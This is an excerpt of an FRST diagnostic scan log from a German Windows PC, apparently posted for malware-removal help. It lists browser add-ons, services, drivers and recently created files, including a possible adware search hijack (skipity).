BHO: Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
BHO: BrowserHelper Class - {9A065C65-4EE7-4DDD-9918-F129089A894A} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO-x32: Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
BHO-x32: No Name - {5C255C8A-E604-49b4-9D64-90988571CECB} -  No File
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
Toolbar: HKLM - Home Server Banner - {D73E76A3-F902-45BD-8FC8-95AE8E014671} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKCU - Home Server Banner - {D73E76A3-F902-45BD-8FC8-95AE8E014671} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{A8B01E69-7297-4C38-B3E3-40775DDD3E9E}: [NameServer]213.94.78.17 213.94.78.16

FireFox:
========
FF ProfilePath: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default
FF user.js: detected! => C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\user.js
FF Homepage: hxxp://www.starobserver.org|hxxp://news.astronomie.info/
FF Keyword.URL: hxxp://search.skipity.com/?source=ab&q=
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @Google.com/GoogleEarthPlugin - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 - C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @t-immersion.com/DFusionHomeWebPlugIn - C:\Program Files (x86)\Total Immersion\DFusionHomeWebPlugIn\NPDFusionWebFirefox.dll (Total Immersion)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.1 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: amazon.com/AmazonMP3DownloaderPlugin - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\searchplugins\s-amazon.xml
FF SearchPlugin: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\searchplugins\skipity-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\googledesktop.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\amazondotcom-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\eBay-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\leo_ende_de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\yahoo-de.xml
FF Extension: German Dictionary - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\de-DE@dictionaries.addons.mozilla.org [2012-10-14]
FF Extension: Print pages to PDF - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\printPages2Pdf@reinhold.ripper [2013-11-12]
FF Extension: WOT - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{a0d7ccb3-214d-498b-b4aa-0e8fda9a7bf7} [2013-11-28]
FF Extension: Firebug - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\firebug@software.joehewitt.com.xpi [2013-09-23]
FF Extension: Write Area - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\writearea@writearea.com.xpi [2012-10-22]
FF Extension: Web Developer - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{c45c406e-ab73-11d8-be73-000a95be3b12}.xpi [2012-08-15]
FF Extension: Adblock Plus - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2013-10-19]
FF Extension: Anti-Banner - C:\Program Files (x86)\Mozilla Firefox\extensions\KavAntiBanner@kaspersky.ru_bak [2013-12-12]
FF Extension: Modul zur Link-Untersuchung - C:\Program Files (x86)\Mozilla Firefox\extensions\linkfilter@kaspersky.ru_bak [2013-12-12]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2013-12-12]
FF HKLM-x32\...\Firefox\Extensions: [virtualKeyboard@kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\virtualKeyboard@kaspersky.ru
FF HKLM-x32\...\Firefox\Extensions: [KavAntiBanner@Kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\KavAntiBanner@kaspersky.ru
FF HKLM-x32\...\Firefox\Extensions: [linkfilter@kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\linkfilter@kaspersky.ru

Chrome: 
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\pdf.dll No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (2007 Microsoft Office system) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
CHR Plugin: (AmazonMP3DownloaderPlugin) - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Picasa) - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (Java(TM) Platform SE 7 U17) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Silverlight Plug-In) - C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll No File
CHR Plugin: (Microsoft Office Live Plug-in for Firefox) - C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
CHR Plugin: (NVIDIA 3D Vision) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
CHR Plugin: (NVIDIA 3D VISION) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
CHR Plugin: (D'Fusion @Home Web Plug-In (3.20.20164)) - C:\Program Files (x86)\Total Immersion\DFusionHomeWebPlugIn\NPDFusionWebFirefox.dll (Total Immersion)
CHR Plugin: (VLC Web Plugin) - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Plugin: (Windows Live\u00AE Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_169.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.170.2) - C:\Windows\SysWOW64\npDeployJava1.dll No File
CHR Extension: (Google Docs) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0 [2013-10-11]
CHR Extension: (Google Drive) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0 [2013-10-11]
CHR Extension: (YouTube) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0 [2013-10-11]
CHR Extension: (Google Search) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0 [2013-10-11]
CHR Extension: (Chrome In-App Payments service) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.4.11_0 [2013-10-11]
CHR Extension: (Gmail) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0 [2013-04-19]

==================== Services (Whitelisted) =================

S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2010-12-18] (Adobe Systems)
R2 Adobe Version Cue CS2; C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe [163840 2005-04-06] (Adobe Systems Incorporated)
R2 arXfrSvc; C:\Program Files\Windows Home Server\Microsoft.HomeServer.Archive.TransferService.exe [231280 2011-01-10] (Microsoft Corporation)
R2 avmike; C:\Program Files\FRITZ!Fernzugang\avmike.exe [335224 2010-03-30] (AVM Berlin)
R2 certsrv; C:\Program Files\FRITZ!Fernzugang\certsrv.exe [143224 2010-03-30] (AVM Berlin)
R2 dgdersvc; C:\Windows\SysWOW64\dgdersvc.exe [95568 2010-05-13] (Devguru Co., Ltd.)
R2 esClient; C:\Program Files\Windows Home Server\esClient.exe [109936 2011-01-10] (Microsoft Corporation)
R2 FirebirdGuardianHS3SRInstance; C:\HS3 Hotelsoftware\DB-Server\bin\fbguard_hs3sr.exe [1265664 2011-01-17] ()
R3 FirebirdServerHS3SRInstance; C:\HS3 Hotelsoftware\DB-Server\bin\fbserver_hs3sr.exe [3735552 2011-01-17] (Firebird Project)
S3 FirebirdServerMAGIXInstance; C:\Program Files (x86)\MAGIX\Common\Database\bin\fbserver.exe [1527900 2005-11-17] (MAGIX®)
S3 GoogleDesktopManager-051210-111108; C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe [30192 2010-12-20] (Google)
R2 HauppaugeTVServer; C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe [577024 2012-03-24] (Hauppauge Computer Works)
R2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [346976 2011-03-14] ()
S3 KiesAllShare; C:\Program Files (x86)\Samsung\Kies\WiselinkPro\WiselinkPro.exe [9241088 2010-05-13] ()
S3 Macromedia Licensing Service; C:\Program Files (x86)\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe [68096 2010-12-19] ()
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-10-23] (Microsoft Corporation)
R2 MWLService; C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\\MWLService.exe [305448 2009-09-10] (Egis Technology Inc.)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [348376 2013-10-23] (Microsoft Corporation)
R2 nwtsrv; C:\Program Files\FRITZ!Fernzugang\nwtsrv.exe [189304 2010-03-30] (AVM Berlin)
R2 TryAndDecideService; C:\Program Files (x86)\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe [498872 2007-08-31] ()
R2 USBS3S4Detection; C:\OEM\USBDECTION\USBS3S4Detection.exe [76320 2009-12-09] ()
R2 WHSConnector; C:\Program Files\Windows Home Server\WHSConnector.exe [489840 2011-01-10] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 dgderdrv; C:\Windows\System32\drivers\dgderdrv.sys [20568 2010-05-13] (Devguru Co., Ltd)
R3 dgderdrv; C:\Windows\SysWOW64\drivers\dgderdrv.sys [18136 2010-05-13] (Devguru Co., Ltd)
S3 hcw17bda; C:\Windows\System32\drivers\hcw17bda.sys [67456 2010-01-27] (Hauppauge Computer Works, Inc.)
S3 huawei_wwanecm; C:\Windows\System32\DRIVERS\ew_juwwanecm.sys [242688 2012-12-22] (Huawei Technologies Co., Ltd.)
S4 Iaaidassi; No ImagePath
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [248240 2013-09-27] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [134944 2013-09-27] (Microsoft Corporation)
R3 NWIM; C:\Windows\System32\DRIVERS\avmnwim.sys [412024 2010-03-30] (AVM Berlin)
R2 TurboB; C:\Windows\System32\DRIVERS\TurboB.sys [13784 2009-08-06] ()
R1 UimBus; C:\Windows\System32\DRIVERS\uimx64.sys [59184 2011-11-17] (Windows (R) 2000 DDK provider)
R1 Uim_IM; C:\Windows\System32\Drivers\Uim_IMx64.sys [572336 2011-11-17] (Paragon)
R1 Uim_VIM; C:\Windows\System32\Drivers\uim_vimx64.sys [352816 2011-11-17] (Paragon)
U5 ew_hwusbdev; C:\Windows\System32\Drivers\ew_hwusbdev.sys [117248 2010-07-27] (Huawei Technologies Co., Ltd.)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-01-15 08:44 - 2014-01-15 08:44 - 00000000 ____D C:\FRST
2014-01-15 08:43 - 2014-01-15 08:44 - 02076160 _____ (Farbar) C:\Users\*****\Downloads\FRST64.exe
2014-01-15 08:42 - 2014-01-15 08:42 - 00000000 _____ C:\Users\*****\defogger_reenable
2014-01-15 08:41 - 2014-01-15 08:41 - 00050477 _____ C:\Users\*****\Downloads\Defogger.exe
2014-01-14 18:44 - 2014-01-14 18:44 - 00002952 _____ C:\Users\*****\Downloads\access_log_2013-11-12.gz
2014-01-14 18:42 - 2014-01-14 18:42 - 00002316 _____ C:\Users\*****\Downloads\access_log_2014-01-05.gz
2014-01-14 18:40 - 2014-01-14 18:50 - 121822819 _____ C:\Users\*****\Downloads\avg_arl_ffi_all_120_130801a6481.rar
2014-01-14 18:28 - 2014-01-14 18:35 - 112001024 _____ C:\Users\*****\Downloads\avg_arl_cdi_all_120_130801a6481.iso
2014-01-14 18:26 - 2014-01-14 18:54 - 625348608 _____ C:\Users\*****\Downloads\rescue-system.iso
2014-01-14 18:15 - 2014-01-14 18:38 - 00043520 ___SH C:\Users\*****\AppData\Roaming\Thumbs.db
2014-01-14 18:09 - 2014-01-14 18:09 - 05063616 _____ (PortableApps.com) C:\Users\*****\Downloads\FileZillaPortable_3.7.3.paf.exe
2014-01-14 15:11 - 2014-01-14 15:11 - 00378099 _____ C:\Users\*****\Downloads\10_246_16_68.sql
2014-01-14 11:03 - 2014-01-14 11:04 - 00000000 ____D C:\Users\*****\Desktop\templates_c
2014-01-13 16:31 - 2014-01-13 16:31 - 01790152 _____ C:\Users\*****\Downloads\com_phocagallery_v3.2.6(1).zip
2014-01-13 14:04 - 2014-01-13 14:04 - 00000282 _____ C:\Users\*****\Desktop\10 Schritte zum erfolgreichen Facebook-Gewinnspiel Fanpage Karma Blog.URL
2014-01-12 16:53 - 2014-01-12 16:53 - 00000217 _____ C:\Users\*****\Desktop\The Scale of the Universe 2 — Other Languages.URL
2014-01-12 10:56 - 2014-01-12 10:56 - 00028736 _____ C:\Users\*****\Downloads\12_01_2014_WebFTP.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00119546 _____ C:\Users\*****\Downloads\droid-serif.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00079700 _____ C:\Users\*****\Downloads\droid-sans-mono.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00011194 _____ C:\Users\*****\Downloads\Droid.zip
2014-01-12 09:19 - 2014-01-12 09:19 - 00211015 _____ C:\Users\*****\Downloads\Droid-Sans.zip
2014-01-11 20:32 - 2014-01-11 20:33 - 00002057 _____ C:\Users\*****\Desktop\configuration.php
2014-01-10 10:58 - 2014-01-10 10:58 - 00036115 _____ C:\Users\*****\Downloads\access-2014010821-2014011002.log.gz
2014-01-09 11:59 - 2014-01-09 12:03 - 126234924 _____ C:\Users\*****\Downloads\Vorübung zu Swan Dive Prep.wmv
2014-01-08 11:52 - 2014-01-08 11:52 - 00002371 _____ C:\Users\*****\Downloads\address.zip
2014-01-08 11:15 - 2014-01-08 11:15 - 00000000 ____D C:\Program Files (x86)\FlippingBook
2014-01-08 11:15 - 2004-03-09 00:00 - 00662288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSCOMCT2.OCX
2014-01-08 11:15 - 1998-07-06 00:00 - 00023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPIDE.DLL
2014-01-08 11:15 - 1998-06-24 00:00 - 00137000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMAPI32.OCX
2014-01-08 11:13 - 2014-01-08 11:15 - 00000000 __HDC C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}
2014-01-08 11:13 - 2014-01-08 11:13 - 00000000 ____D C:\Users\*****\AppData\Local\III
2014-01-07 19:50 - 2014-01-07 19:50 - 00000233 _____ C:\Users\*****\Desktop\Fly Birds Hd Legendary Birds Legendary Pokemon. Colourful Pheasant Birds Wallpapers. Fly Birds Hd ~ Photoinpixel.URL
2014-01-04 19:06 - 2014-01-04 19:06 - 00003714 _____ C:\Users\*****\Desktop\pointclouds - Verknüpfung.lnk
2014-01-02 11:26 - 2014-01-02 11:26 - 00000053 _____ C:\Users\*****\Desktop\google63a169ac443c121d.html
2013-12-31 14:08 - 2013-12-31 14:08 - 00000225 _____ C:\Users\*****\Desktop\macklemore album.URL
2013-12-30 20:11 - 2013-12-30 20:16 - 176752984 _____ (VMware, Inc.                                                   ) C:\Users\*****\Downloads\VMware-converter-en-5.5.0-1362012.exe
2013-12-30 08:54 - 2013-12-30 08:58 - 98508144 _____ (VMware, Inc.) C:\Users\*****\Downloads\VMware-player-6.0.1-1379776.exe
2013-12-30 08:35 - 2013-12-30 08:35 - 00409141 _____ C:\Users\*****\Downloads\torbutton146-current.zip
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Roaming\Stellarium
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Local\stellarium
2013-12-29 12:28 - 2013-12-29 12:28 - 00001724 _____ C:\Users\Public\Desktop\Stellarium.lnk
2013-12-29 12:28 - 2013-12-29 12:28 - 00000000 ____D C:\Program Files\Stellarium
2013-12-29 11:22 - 2013-12-29 11:24 - 81699167 _____ (Stellarium team                                             ) C:\Users\*****\Downloads\stellarium-0.12.4-win64.exe
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_juextctrl_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jucdcacm_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____D C:\Users\*****\AppData\Roaming\Sierra Wireless
2013-12-28 11:56 - 2013-12-28 11:57 - 00000000 ____D C:\ProgramData\mquadr.at
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jubusenum_01007.Wdf
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____D C:\Users\*****\AppData\Local\mquadr.at
2013-12-28 11:55 - 2013-12-28 11:55 - 00001163 _____ C:\Users\Public\Desktop\3InternetManager.lnk
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 __HDC C:\ProgramData\{A48B2592-413B-41AB-8710-5543CB7481EC}
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\ProgramData\H3G
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\Program Files (x86)\3InternetManager
2013-12-28 11:55 - 2013-06-06 13:00 - 03748792 ____N (mquadr.at software engineering und consulting GmbH) C:\Windows\SysWOW64\M2ElevatedCalls.dll
2013-12-28 11:55 - 2012-12-22 09:46 - 00014976 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_usbenumfilter.sys
2013-12-28 11:55 - 2012-12-22 09:41 - 00242688 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juwwanecm.sys
2013-12-28 11:55 - 2012-12-22 09:41 - 00076800 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcecm.sys
2013-12-28 11:55 - 2012-12-03 18:40 - 00452608 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbwwan.sys
2013-12-28 11:55 - 2012-12-03 14:57 - 00238592 ____N (Nicomsoft Ltd.) C:\Windows\SysWOW64\WiFiMan.dll
2013-12-28 11:55 - 2012-08-20 08:55 - 00104960 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcacm.sys
2013-12-28 11:55 - 2012-08-20 08:55 - 00090112 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jubusenum.sys
2013-12-28 11:55 - 2012-08-20 08:55 - 00030720 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juextctrl.sys
2013-12-28 11:55 - 2012-08-20 08:37 - 01490656 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01007.dll
2013-12-28 11:55 - 2012-08-20 08:37 - 01490656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfCoInstaller01007.dll
2013-12-28 11:55 - 2011-12-31 09:20 - 00225920 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbmdm.sys
2013-12-28 11:55 - 2010-10-08 16:59 - 00032768 _____ (Huawei Tech. Co., Ltd.) C:\Windows\system32\Drivers\ewdcsc.sys
2013-12-28 11:55 - 2010-09-26 18:09 - 00022016 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_hwupgrade.sys
